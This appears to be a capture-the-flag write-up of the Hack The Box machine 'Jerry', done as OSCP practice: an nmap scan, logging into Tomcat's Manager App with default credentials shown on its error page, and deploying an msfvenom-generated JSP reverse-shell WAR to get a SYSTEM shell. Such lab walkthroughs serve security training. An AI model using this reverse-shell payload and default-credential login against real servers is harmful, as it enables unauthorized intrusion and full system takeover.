Hack The Box — Jerry — without Metasploit (TJNull’s list for OSCP)

Jerry

This is my 4th write-up for Jerry, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

1. Enumeration and Scanning (Information Gathering).
2. Initial Foothold.
3. Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target.

nmap -sC -sV -A -T4 -p- 10.129.72.115

• -sC is used to run default scripts to enumerate the services further.
• -sV is used for Version enumeration of the services
• -A is used for aggressive (not usually recommended in real environment)
• -T4 is used to set the number of parallel threads.
• -p- is used to do a full port scan from 1–65535.

nmap

So, there appears to be only one port open, that is 8080 (Apache Tomcat/7.0.88). Let’s visit the web and see what do we have.

Web server at port 8080

It’s just a default Tomcat page. Here we can see a button for Manager App.

By name it seems to be management portal. Navigate to that.

login prompt

It gives the login prompt. We don’t have the credentials yet. So, we gonna click on cancel. As soon as we click cancel, the server leads us to an Error 401. But if we read the content on that page. We can see possible user credentials tomcat:s3cret (I didn’t know if those credentials were valid or just an example demonstrate.)

credentials

Exploitation

Note: At first I tried different exploits for CVE-2017–12617 but non of them worked, maybe because it requires PUT method enabled and we don’t have it enabled on the current web server. But I am skipping all those failed attempts because we are gonna stick to the thing that actually worked. I am telling you this only to tell that it took me some failed attempts as well, and if you had them too, you are not the only one. :)

Let’s go back and try these credentials.

Management portal

And fortunately the credentials turned out to be valid.

If we look at the bottom of this page we can find WAR file to deploy section. From there we can upload a WAR package and deploy that on our web server.

WAR upload

Let’s use msfvenom to generate a WAR reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o shell.war

WAR payload generation

Let’s upload it and from the management portal and click deploy.

After WAR package has been uploaded we can see it in the Applications section.

WAR uploaded

Let’s start a listener first.

listening on port 80

Now, by clicking on the /shell in the Applications section in the portal we get a reverse shell.

reverse shell

And we got an nt authority\system shell! Which means we have full Administrative privileges and don’t need to do any privilege escalation.

Let’s navigate to C:\Users\Administrator\Desktop\flags to get the flags.

flags

EZ PZ! :)